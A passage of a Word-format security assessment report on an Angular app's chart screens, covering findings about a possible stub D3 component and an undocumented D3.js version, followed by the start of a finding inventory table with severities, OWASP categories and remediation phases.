        <w:t xml:space="preserve">to confirm whether it contains substantive production content or is a placeholder/stub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If it is a stub, either complete the implementation with proper security controls or remove the route from the production routing configuration until implementation is complete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Establish a pre-deployment checklist that includes verification that no stub or placeholder components are registered in production routing modules.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Not documented — WHO: the development team responsible for the D3 charts feature; WHAT: Does</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">d3.component.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">contain production-ready content, a placeholder, or any debug/development artifacts? What child components does it declare?; WHERE: Insert confirmed template content description into the Description and Attack Scenario sections of SEC-012]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SEC-013: Unconfirmed D3.js Version — Known CVE Exposure Risk</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Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A06 — Vulnerable &amp; Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1104: Use of Unmaintained Third-Party Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">AVSV Requirement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V14.2.1 — Verify that all components are up to date, preferably using a dependency checker during build or compile time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">D3Component</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— D3.js library dependency in child components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Affected Data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Client-side rendering integrity; SVG/DOM manipulation security</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The documentation confirms that D3.js is the core library for this screen but notes: "D3.js itself, while central to the screen's purpose, is not imported in this component file — it would be imported in child components or directives that perform the actual rendering." No version number is documented for D3.js. D3.js has had security-relevant releases, and older versions may be susceptible to prototype pollution or SVG injection vulnerabilities. This finding is related to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-009">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-009</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Chart.js version gap) and should be addressed as part of the same SCA remediation effort.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Section 13 of the D3 screen documentation states: "D3.js itself, while central to the screen's purpose, is not imported in this component file — it would be imported in child components or directives that perform the actual rendering." No version information is provided anywhere in the documentation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Scenario:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">An outdated version of D3.js with a known SVG injection vulnerability is installed. An attacker who can influence the data rendered by a D3 child component injects a malicious SVG payload that executes JavaScript in the context of the application's origin, bypassing same-origin policy protections.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">npm audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">or an equivalent SCA tool to identify the installed D3.js version and any associated CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Update D3.js to the latest stable version (v7.x as of this report's date).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Integrate SCA scanning into the CI/CD pipeline (see</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink w:anchor="sec-009">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">SEC-009</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">remediation for shared pipeline steps).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[Not documented — WHO: the development team or build engineer; WHAT: What is the exact installed version of D3.js as declared in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">?; WHERE: Insert confirmed version number into the Description section of SEC-013 and cross-reference against the NVD CVE database]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Source Evidence:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">D3 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/charts/d3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — Section 13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="31"/>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkStart w:id="33" w:name="Xe729274e1ff7b4891a87945c222cbad6173b80d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Finding Inventory</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="990"/>
        <w:gridCol w:w="990"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Screen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AVSV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Remediation Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Charts (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unverified Route Guard Coverage for</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Hierarchy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-862</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V4.1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Short-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D3 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/d3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D3.js DOM Manipulation XSS Risk in Child Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-79</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V5.3.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Short-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-011</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D3 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/d3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No Security Logging or Monitoring — D3 Screen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-778</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Short-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Charts (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">No Wildcard/404 Route Handling for Unmatched Child Routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-755</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V7.4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Chartjs (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/chartjs</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hardcoded Chart Data in Template — Data Integrity Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-798</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">D3 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts/d3</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Potential Stub/Placeholder Component — Incomplete Implementation Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">A04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CWE-1059</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">V1.1.6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Medium-Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SEC-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Charts (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/charts</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Missing</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ChangeDetectionStrategy.OnPush</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">— Defense-in-Depth Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
